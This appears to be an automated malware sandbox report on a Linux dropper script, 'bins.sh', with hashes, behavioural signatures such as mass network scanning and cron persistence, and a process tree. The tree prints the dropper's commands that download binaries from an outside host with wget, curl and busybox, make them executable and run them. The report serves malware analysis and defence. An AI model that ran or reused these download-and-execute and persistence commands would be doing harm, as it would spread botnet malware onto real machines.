Analysis
-
max time kernel
150s -
max time network
153s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem -
submitted
09-11-2024 04:20
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
e0e937bb99f87489de87877ed4f4ab32
-
SHA1
74fc4c4763b0eb2c3fd6ae02b523d07265459f2d
-
SHA256
bc293307089e34718c81627d4ffe57784dca24f2e79a453d04807a28dd9f84fc
-
SHA512
ff4a387f24869f556779add942d1b65d76a3f6c0b54e26f66ce483821bcdbdd09f9e050ed5f5dcfed968bca6e098b5663536f595de4c447c31ce57da395f37fa
-
SSDEEP
192:wjfmNFBfTom+NQs+IxUD3b90sPa2HPDxBHIjfmNFbwm+NQsheD3d0sPa2zPD1:wjfmNFBfTom+NQs+IxEVPDxBHIjfmNFJ
Malware Config
Signatures
-
Contacts a large (2083) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 730 chmod -
Executes dropped EXE 1 IoCs
Processes:
d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQURioc pid process /tmp/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR 731 d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR -
Renames itself 1 IoCs
Processes:
d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQURpid process 733 d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.sZrA9v crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQURcrontabdescription ioc process File opened for reading /proc/984/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1057/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1077/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1103/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/11/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/953/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1014/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1018/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1036/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1144/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/738/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/696/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/928/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1196/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1216/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1241/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1301/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/167/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/864/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/870/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/990/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1133/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/filesystems crontab File opened for reading /proc/908/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/831/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1214/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/361/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/888/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/898/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1083/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1132/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1264/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1287/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/9/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1004/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1125/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1140/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/744/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/753/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/985/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1080/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/677/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/930/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/996/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/998/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1081/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1185/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1217/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/776/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/866/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1022/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1259/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1266/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/783/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/815/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/927/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1136/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1286/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/800/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/933/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1040/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/1155/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/756/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR File opened for reading /proc/986/cmdline d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR -
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
wgetcurlwgetcurlbusyboxpid process 830 wget 835 curl 706 wget 720 curl 729 busybox -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc process File opened for modification /tmp/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR wget File opened for modification /tmp/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR curl File opened for modification /tmp/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:704
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:706 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:720 -
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:729 -
/bin/chmodchmod 777 d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR2⤵
- File and Directory Permissions Modification
PID:730 -
/tmp/d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR./d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:731 -
/bin/shsh -c "crontab -l"3⤵PID:734
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:735 -
/bin/shsh -c "crontab -"3⤵PID:736
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:737 -
/bin/rmrm d7xECxY8vx7vNsyOodn9CCQcZxPDKdCQUR2⤵PID:739
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kLcZBrEdR419Qbm97mNOedgKCgCp2aQVIU2⤵
- System Network Configuration Discovery
PID:830 -
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kLcZBrEdR419Qbm97mNOedgKCgCp2aQVIU2⤵
- System Network Configuration Discovery
PID:835
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD53c90d5820bddcf7c5d1bd21dfa49d958
SHA15ba05bd489e50af97d6dc45e3a0be60e494d5083
SHA256bdebb67266d5f96b7d85cfb9644deee81161b54b60b0fded6cf36544a15fa9b2
SHA51254a0e2ec10040634100fb5c4bddc35f558471f4ff833f9ad20f16ffd14c286cf251841bdaad7c557c3c78efc2094db91038c195c0ddabdecf9beac97ff2ce01a
-
Filesize
210B
MD57727494e61722805287f19dde48eea08
SHA1d687998bcc23cf9ba045d377024edec06a4798ba
SHA2565d8ebce38ea31268d68fa830d3539cc243540bf5cadaac0064252b7e1ebeb0a9
SHA5122a3aa17205a289af4b955e06d97510f5cd7fa5a33200bb507f6a69080ad15473f18728a52c17c540bcbf83e52f8a3924d6b35dcde0b6015f9cdc0ca4b1510665